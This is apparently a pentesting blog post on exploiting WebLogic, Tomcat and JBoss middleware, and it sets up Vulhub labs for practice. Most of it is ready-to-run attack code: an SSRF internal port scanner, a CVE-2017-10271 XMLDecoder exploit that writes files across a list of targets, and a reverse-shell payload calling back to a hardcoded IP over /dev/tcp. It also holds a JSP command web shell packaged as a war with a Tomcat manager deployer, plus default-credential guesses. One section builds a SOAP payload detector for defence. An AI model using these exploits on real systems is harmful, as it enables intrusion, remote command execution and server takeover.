Preface

An article on middleware vulnerabilities, summarising how a number of common middleware vulnerabilities are exploited.

Pentesting environments

When learning a vulnerability, reproducing it is a must: however many articles you read, if you never reproduce the bug yourself you will not necessarily remember it the next time you run into it. So the first thing to cover is where to find environments to practise in. Several options are listed below; only the Vulhub setup is described here, the others are documented in detail on their own sites.

  • Vulhub, VulApps (Docker-based, only a few commands)

  • ZoomEye, 傻蛋 (convenient for finding real-world instances)

  • Google, Bing (the search operators of both are powerful)

Vulhub and VulApps

How to install and use Vulhub
Install
apt install git docker.io docker-compose
git clone https://github.com/vulhub/vulhub.git

Enter a vulnerability environment
cd vulhub/weblogic/ssrf/

Build the environment (only needed for environments that ship a Dockerfile; most pull prebuilt images and `up -d` alone is enough)
docker-compose build

Start the whole environment
docker-compose up -d

Tear the whole environment down
docker-compose down

On newer Docker installs where Compose is a plugin, the same commands are `docker compose build`, `docker compose up -d` and `docker compose down`.

If you want VulApps, see the instructions on GitHub. Both project addresses are below:
https://github.com/vulhub/vulhub
https://github.com/Medicean/VulApps

WebLogic

  • Weak password

  • SSRF

  • Deserialization

Weak password

Default port: 7001

Default console: /console/login/LoginForm.jsp

Weak password: weblogic/weblogic (the vulhub weak_password environment uses weblogic/Oracle@123)

Deploying a war: Deployments -> Install -> Upload your file(s) -> choose the file -> Next -> Next -> Finish. The context root defaults to the war's base name, so shell.war is reached at /shell/.

SSRF

CVE-2014-4241

Vulnerable path: /uddiexplorer/ (the sink is the operator parameter of SearchPublicRegistries.jsp, which is the URL WebLogic itself connects to)

EXP:
GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Whether an internal port is open is judged from the difference in the error text WebLogic returns for each operator URL.
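The port-state inference described above, written out as an added example (this is not code from the original post). It reuses the request parameters of the EXP but injects the HTTP fetch so the classification logic can be exercised offline against constructed responses. The two marker strings are an assumption about the error text UDDI Explorer produces for a refused connection versus a connection that got an answer; confirm them on the target with one known-open and one known-closed port (for example 7001 and an unused port) before trusting a sweep.

```python
import urllib.error
import urllib.parse
import urllib.request

# Assumed response markers (verify against the target before relying on them).
CLOSED_MARKER = "could not connect over HTTP to server"
OPEN_MARKERS = ("Received a response from the server",
                "did not have a valid SOAP content-type")

SEARCH_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"


def build_probe_url(base, target_host, target_port):
    """URL for SearchPublicRegistries.jsp whose operator parameter makes
    WebLogic open a connection to target_host:target_port (same parameters
    as the EXP request above)."""
    params = {
        "rdoSearch": "name",
        "txtSearchname": "sdf",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Business location",
        "btnSubmit": "Search",
        "operator": "http://%s:%d" % (target_host, target_port),
    }
    return base.rstrip("/") + SEARCH_PATH + "?" + urllib.parse.urlencode(params, safe=":/")


def classify_response(body):
    """Map the page WebLogic returns to the state of the probed port."""
    if CLOSED_MARKER in body:
        return "closed"
    if any(marker in body for marker in OPEN_MARKERS):
        return "open"
    return "unknown"


def scan_ports(base, target_host, ports, fetch):
    """fetch(url) -> response body as str. Injected so the scan can run
    against constructed responses offline or against a live target."""
    return {port: classify_response(fetch(build_probe_url(base, target_host, port)))
            for port in ports}


def http_fetch(url, timeout=10):
    """Live fetch. WebLogic answers the SSRF errors with an HTTP error page,
    so the body of an HTTPError is returned too instead of being dropped."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


# Constructed responses standing in for a live target: 7000 closed, 7001 open.
SAMPLE_RESPONSES = {
    7000: "An error has occurred<br>weblogic.uddi.client.structures.exception.XML_SoapException: "
          "Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '7000'",
    7001: "An error has occurred<br>weblogic.uddi.client.structures.exception.XML_SoapException: "
          "Received a response from the server. The response did not have a valid SOAP content-type: text/html.",
}


def sample_fetch(url):
    """Offline stand-in for http_fetch: answer from SAMPLE_RESPONSES by port."""
    operator = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["operator"][0]
    return SAMPLE_RESPONSES.get(int(operator.rsplit(":", 1)[1]), "")


if __name__ == "__main__":
    base = "http://127.0.0.1:7001"   # assumed target
    print(scan_ports(base, "127.0.0.1", [7000, 7001, 6379], sample_fetch))
    # Live: scan_ports(base, "127.0.0.1", range(1, 1025), http_fetch)
```

A port that answers with neither marker is reported as "unknown" rather than guessed; those are the ones to inspect by hand, since a non-HTTP service (Redis on 6379, for instance) may produce a different error than an HTTP one.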

Deserialization

CVE-2016-0638

Command: python2 Weblogic.py (edit the IP and port in main before use)

CVE-2017-3248 weblogic_cmd.jar

Command: java -jar weblogic_cmd.jar -C ls -H IP -P 7001

CVE-2017-10271 (XMLDecoder)

Vulnerable path: http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11 (if the path responds, the wls-wsat component is deployed; that shows the attack surface exists but not that it is unpatched, so confirm with a harmless payload such as the file write below before firing a shell)

EXP WriteTxt:
import requests
import time

headers = {'Content-type': 'text/xml'}
# XMLDecoder payload: instantiate java.io.PrintWriter on a path inside the
# bea_wls_internal web app and write one marker line. The 9j4dqk directory
# name is specific to the target deployment; adjust it if the check returns 404.
data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/bywalks.txt</string><void method="println"><string>Weblogic_Test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''

def exp(ip):
    ip = ip.strip()
    url_post = ip + "/wls-wsat/CoordinatorPortType11"
    url_myfile = ip + "/bea_wls_internal/bywalks.txt"
    print("Test for " + ip + ".....")
    r = requests.post(url=url_post, data=data, headers=headers)
    r2 = requests.get(url_myfile)
    if r2.status_code != 404:
        print("Weblogic Vulnerable!!!")
        print("Your file path is " + url_myfile)
    else:
        print("No Vulnerable!!!")
    print("=================================================")

if __name__ == '__main__':
    # weblogic.txt holds one base URL per line, e.g. http://host:7001
    with open("weblogic.txt") as f:
        Weblogic_IP_list = f.readlines()
    for ip in Weblogic_IP_list:
        try:
            exp(ip)
            time.sleep(1)
        except Exception as e:
            print("Error for " + ip.strip() + ": " + str(e))

EXP ReturnShell:
import requests

headers = {'Content-type': 'text/xml'}
# XMLDecoder payload that runs a bash reverse shell through ProcessBuilder.
# Replace 113.75.162.62:8888 with your own listener (e.g. nc -lvp 8888).
# The > and & in the bash command must be XML-escaped (&gt; and &amp;);
# with raw characters XMLDecoder rejects the document and nothing runs.
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/113.75.162.62/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''

def exp(ip):
    print("Test for " + ip + " .....")
    r = requests.post(url=ip, data=data, headers=headers)
    print(r.status_code)
    print(r.text)

if __name__ == '__main__':
    ip = "http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11"
    try:
        exp(ip)
    except Exception as e:
        print(e)
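The two scripts above only send payloads. As an added example (not code from the original post), the block below looks at the same traffic from the other side: it parses a SOAP request the way a WAF or log-review script would and reports whether the WorkContext header carries an XMLDecoder document, which classes it instantiates and which strings (paths, command arguments) it passes. It also generalises the ReturnShell envelope to an arbitrary argv with proper XML escaping, which is the detail that silently breaks hand-edited payloads containing bash redirections. The sample envelopes are constructed for this example (the WriteTxt one is the page's own payload; the shell one uses an assumed listener 10.0.0.1:8888).

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"
# Classes whose presence in an XMLDecoder document means a side effect on the server.
DANGEROUS_CLASSES = {"java.lang.ProcessBuilder", "java.lang.Runtime",
                     "java.io.PrintWriter", "java.io.FileOutputStream"}


def inspect_soap(body):
    """Summarise what a SOAP request would make XMLDecoder do.

    Returns a dict with: xmldecoder (an XMLDecoder document sits inside a
    WorkContext header), classes (class attributes seen inside it),
    strings (every <string> value: file paths, command arguments) and
    dangerous (xmldecoder and at least one class from DANGEROUS_CLASSES)."""
    result = {"xmldecoder": False, "classes": [], "strings": [], "dangerous": False}
    try:
        root = ET.fromstring(body.strip() if isinstance(body, str) else body)
    except ET.ParseError as err:
        result["error"] = str(err)
        return result
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for elem in ctx.iter():
            cls = elem.get("class")
            if elem.tag == "java" and cls == "java.beans.XMLDecoder":
                result["xmldecoder"] = True
            elif cls and cls not in result["classes"]:
                result["classes"].append(cls)
            if elem.tag == "string":
                result["strings"].append(elem.text or "")
    result["dangerous"] = result["xmldecoder"] and bool(DANGEROUS_CLASSES & set(result["classes"]))
    return result


def build_processbuilder_payload(argv):
    """The ReturnShell envelope generalised to any argv. escape() turns
    > and & into &gt; and &amp; so the document stays well-formed."""
    items = "".join('<void index="%d"><string>%s</string></void>' % (i, escape(arg))
                    for i, arg in enumerate(argv))
    return ('<soapenv:Envelope xmlns:soapenv="%s"><soapenv:Header>'
            '<work:WorkContext xmlns:work="%s">'
            '<java version="1.8.0_131" class="java.beans.XMLDecoder">'
            '<void class="java.lang.ProcessBuilder">'
            '<array class="java.lang.String" length="%d">%s</array>'
            '<void method="start"/></void></java>'
            '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
            % (SOAP_NS, WORKAREA_NS, len(argv), items))


# Constructed samples: a benign request, and the WriteTxt envelope from the page.
BENIGN = ('<soapenv:Envelope xmlns:soapenv="%s"><soapenv:Header/>'
          '<soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>' % SOAP_NS)
WRITE_TXT = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
             '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
             '<java><java version="1.4.0" class="java.beans.XMLDecoder">'
             '<object class="java.io.PrintWriter">'
             '<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/bywalks.txt</string>'
             '<void method="println"><string>Weblogic_Test</string></void>'
             '<void method="close"/></object></java></java></work:WorkContext>'
             '</soapenv:Header><soapenv:Body/></soapenv:Envelope>')
SHELL_ARGV = ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.0.0.1/8888 0>&1"]

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("write", WRITE_TXT),
                       ("shell", build_processbuilder_payload(SHELL_ARGV))):
        print(label, inspect_soap(doc))
```

Any WorkContext header that contains an XMLDecoder document is worth an alert on its own; the dangerous flag just ranks the ones that already carry a write or exec.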

Tomcat

  • Weak password

  • PUT upload

Weak password

Default port: 8080

Default path: /manager/html (the manager app ships with no users enabled, so access depends on what was added to conf/tomcat-users.xml; tomcat/tomcat and admin/admin are the usual guesses)

Generate the war (run inside the folder holding the shell): jar -cvf shell.war ./

Deploying the war: choose the file -> Deploy -> done (it is then served at /shell/, the war's base name)
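The war deployment steps for WebLogic above and for Tomcat here both start from the same artefact, so as an added example (not code from the original post) the block below builds that war in Python instead of with `jar -cvf`, shows where the deployed JSP ends up, and deploys it through Tomcat's manager text interface. The JSP and web.xml contents are constructed for the example; the deploy function assumes a manager account with the manager-script role (the /manager/html page used in the steps above needs manager-gui instead).

```python
import base64
import io
import urllib.request
import zipfile

# Constructed JSP: runs the ?cmd= parameter and echoes its stdout.
CMD_JSP = r'''<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = br.readLine()) != null) { out.println(line); }
}
%>
'''

# Constructed minimal deployment descriptor; Servlet 3.x containers accept a war without one.
WEB_XML = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <display-name>shell</display-name>
</web-app>
'''


def build_war(jsp_name="shell.jsp", jsp_source=CMD_JSP):
    """Same layout `jar -cvf shell.war ./` produces from a folder holding
    shell.jsp and WEB-INF/web.xml: a zip with the JSP at the archive root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Entry names of a war, after checking the archive is intact."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        if war.testzip() is not None:
            raise ValueError("corrupt war")
        return sorted(war.namelist())


def war_read(war_bytes, name):
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name)


def shell_url(base, war_filename, jsp_name="shell.jsp"):
    """Tomcat and WebLogic both use the war's base name as the context root."""
    context = war_filename[:-4] if war_filename.endswith(".war") else war_filename
    return "%s/%s/%s" % (base.rstrip("/"), context, jsp_name)


def tomcat_deploy(base, user, password, context, war_bytes, timeout=30):
    """PUT the war to /manager/text/deploy. Needs the manager-script role.
    Tomcat answers with a line starting "OK - " or "FAIL - "."""
    url = "%s/manager/text/deploy?path=/%s&update=true" % (base.rstrip("/"), context)
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    war = build_war()
    print(war_entries(war))
    print(shell_url("http://10.0.0.5:8080", "shell.war"))     # assumed target
    # Live: print(tomcat_deploy("http://10.0.0.5:8080", "tomcat", "tomcat", "shell", war))
```

After a successful deploy, `shell_url(base, "shell.war") + "?cmd=id"` is the first request to make; a 404 there usually means the JSP was not at the archive root (nested one folder deeper because `jar` was run from the parent directory).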

PUT upload

There is an EXP for this elsewhere on this blog. The precondition is that the DefaultServlet's readonly init-param in conf/web.xml has been set to false, which lets a PUT request create files under the webroot.

JBoss

  • WAR deployment

  • Deserialization

WAR deployment

Default port: 8080

Default console: /jmx-console

Deployment steps: under the jboss.deployment domain open flavor=URL,type=DeploymentScanner -> addURL() with the URL of a war hosted on a server you control -> Invoke; the scanner fetches and deploys it (jboss.system:service=MainDeployer -> deploy() with the same URL does the same) -> access /<warname>/

Deserialization

CVE-2015-8103   DeserializeExploit.jar (Java deserialization via /invoker/JMXInvokerServlet)

CVE-2017-12149 Jboss.jar (Java deserialization via /invoker/readonly, the HttpInvoker ReadOnlyAccessFilter)